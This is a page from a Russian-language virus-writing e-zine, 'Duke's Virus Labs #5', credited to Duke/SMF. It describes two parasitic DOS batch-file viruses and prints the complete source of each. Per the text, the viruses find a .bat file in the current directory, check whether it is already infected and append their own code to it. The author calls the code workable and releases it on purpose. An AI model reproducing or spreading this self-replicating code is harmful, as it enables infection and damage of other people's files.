- [Duke's Virus Labs #5] - [Page 10] -

BAT.MF.116 & BAT.MF.102.a
(c) by Duke/SMF

Имя вируса    : BAT.MF.116
Автор         : Duke/SMF
Язык прогр.   : DOS-script
Дата создания : 06.12.98

   Этот вирус как-то отбился от своих родичей (см. DVL #3 статья 3), и я
не стал лишать его возможности повидать мир. Тем более, что он вполне
работоспособен.
   Итак, это паразитический BAT-вирус. Ищет и поражает 1 файл в текущем
каталоге, проверяет файлы на зараженность. Проверяет и не размножается из
файла AUTOEXEC.BAT.Выдает посторонние надписи на экран :(( Зато мелкий...

===== Cut here =====
@if "%0=="%Duke/SMF% exit
@for %%b in (*.bat) do set MF=%%b
@find "MF"<%MF%
@if errorlevel 1 find "MF"<%0>>%MF%
===== Cut here =====


Имя вируса    : BAT.MF.102.a
Автор         : Duke/SMF
Язык прогр.   :
Дата создания : 21.02.99

   А этот вирусок еще меньше. В остальном работает так же.

===== Cut here =====
@if not "%0==" for %%b in (*.bat) do set $=%%b
@find "$"<%$%>nul
@if errorlevel 1 find "$"<%0>>%$%
===== Cut here =====
